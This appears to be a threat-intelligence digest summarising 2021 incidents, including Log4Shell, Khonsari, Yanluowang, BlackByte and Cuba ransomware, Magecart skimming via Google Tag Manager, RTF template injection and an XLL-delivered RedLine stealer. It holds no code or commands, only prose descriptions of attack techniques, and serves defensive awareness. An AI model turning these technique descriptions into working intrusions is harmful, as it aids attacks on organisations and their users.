Cloudflare identified and mitigated a distributed denial-of-service attack amassing a record 26 million requests per second (rps).
Microsoft’s tracking of Blackcat/ALPHV ransomware gang has identified an adaptable group of operators utilizing various tactics, techniques, and procedures (TTPs) in their campaigns.
Khonsari Ransomware & Log4Shell
Ransomware family – Khonsari has been observed utilizing CVE-2021-44228/Log4Shell vulnerability targeting Windows servers. The malware executable “groenhuyzen.exe” is dropped and exploits the JNDI class. The malware’s functionality is straightforward at only 12 KB, it’ll enumerate and encrypt (with extension – .khonsari) all mounted drives with the exception of C:\. Only user directories are encrypted including Documents, Videos, Pictures, Downloads, and Desktop.
CVE-2021-44228 / Log4Shell Vulnerability
Industry: N/A | Level: Tactical | Sources: LunaSec & GitHub-Log4Shell-List
A zero-day exploit has been identified for Java logging library “log4j” that could result in remote code execution. Affected versions include Log4j 2.0-beta9 up to 2.14.1 with service impacts to many Apache Struts configurations and cloud services such as Steam, Apple iCloud, and others.
The exploit requires three components a vulnerable log4j version, any protocol that enables the attack to send the exploit string, and a log statement that can log the string from the request.
Mitigation is available through an update with affected users recommended to update to log4j version “log4j-2.15.0-rc2”. Threat researchers have identified a variety of threats Kinsing (cryptocurrency miner), Mirai Malware, Cobalt Strike, a new unidentified ransomware strain, and likely others, yet to be identified, taking advantage of the widespread vulnerability.
|
Magecart Abuses Google Tag Manager Industry: eCommerce | Level: Strategic | Source: GeminiAdvisoryThe Magecart threat actor group has abused the Google Tag Manager (GTM) service by discriminately adding malicious JavaScripts within the GTM container. The GTM service was intended to allow web authors the capability to update measurement codes and other code fragments. Abused GTM containers execute the embedded JavaScript when a browser loads the link to a container, collecting unsuspected buyer information through the use of additional payment forms and exfiltrate the data to a remote collection server. These findings are reported by Gemini Advisory a Recorded Future company, who has been observing the threat since February 4th, 2021. Three hundred and sixteen ecommerce sites were compromised with infected containers, resulting in at least 88,000 payment card records posted for sale on dark web markets. |
ANSSI Alerts of Nobelium Targeting French Organizations
French national cyber-security agency, ANSSI, raised an alert detailing Nobelium phishing campaigns directed at French entities. The campaign observation began in February 2021 with noticed escalation in May. The French email accounts are compromised and then used to send weaponized emails to foreign institutions in the diplomatic sector. The threat group is utilizing various hosting methods, mainly OVH SAS, Hydra Communications Ltd, M247 Ltd and 12 additional observed hosting providers.
NSO Spyware Compromises US State Department Employees’ Phones
Apple Inc. has informed at least nine, US Department of State employees, their iPhones had been compromised due to NSO Pegasus spyware. Impacted officials were all either based in Uganda or focused on matters concerning the East African country, as shared by two Reuters sources. The compromises occurred within the last several months.
RTF Template Injection
Proofpoint has observed increased usage of RTF template injections from threat actors TA423, DoNot Team, and Gamaredon since as early as February 2021 with files publicly identified on April 5th. The template injections enables the threat actor to alter the RTF file’s control word structure to substitute a legitimate file destination with a URL that could download a malicious payload. Detection rates for this technique have so far been low. The APT groups have been targeting various organizations and countries with this technique. APT group DoNot Team and TA423 are both associated with targeting Malaysia’s Deepwater energy exploration, while APT actor, Gamaredon, targeted the Ukrainian government.
Microsoft Excel (XLL) Leads to RedLine Info-Stealer
Threat Actors are utilizing public discussion forums, or article comment systems, to spread malicious Excel documents that ultimately download and install RedLine information stealer. Malicious links are hosted on Google Drive and download a XLL which BleepingComputer describes as, “an an add-in that allows developers to extend the functionality of Excel by reading and writing data, importing data from other sources, or creating custom functions to perform various tasks. XLL files are simply a DLL file that includes an ‘xlAutoOpen’ function executed by Microsoft Excel when the add-in is opened.” While tests have had unsuccessful executions, potentially due to incompatible versions of Microsoft Excel, the sequence appears to involve the DLL being executed with regsvr32 or rundll32 that extracts the wget.exe program to download the RedLine binary saving it as %UserProfile%\JavaBridge32.
|
Yanluowang Ransomware Linked to Thieflock Affiliate Industry: Consultancy, Engineering, Financial & Manufacturing | Level: Tactical | Source: SymantecYanluowang ransomware group, active since at least August 2021, have been targeting US Corporations, specifically in the financial, manufacturing, IT, consultancy, and engineering sectors. The group has been utilizing TTPs similar to Theiflock ransomware attacks. Based on observations by Symantec, it seems there is a link, or a shifting of allegiances from Thieflock to the Yanluowang ransomware family. Notable noticed TTP patterns have been the usage of BazarLoader for initial access, PowerShell to download tools enabling RDP in the registry, Adfind for reconnaissance, and the usage of other various credential-stealing tools.
|
BlackByte Ransomware from RedCanary
RedCanary presented research from a BlackByte ransomware incident response engagement with Kroll. The attack sequence covered initial access from ProxyShell and web shell through post-exploitation with cobalt strike, impairing defenses with process monitoring, windows defender, and firewall modifications to ransomware and file exfiltration.
Cuba Ransomware
The FBI released a flash report for Cuba ransomware based on tracking since November 2021, has compromised 49 entities across various critical infrastructure sectors, including but not limited to, financial, government, healthcare, manufacturing, and information technology. Hancitor malware is identified as the initial infection vector that leads to the Cuba ransomware. Threat actors utilize phishing emails, Microsoft Exchange vulnerabilities, compromised credentials, and RDP tools to gain initial access. Many legitimate Windows services are employed by the threat actors as well such as PowerShell, PsExec, in addition to leveraging Windows Admin privileges to execute their ransomware.
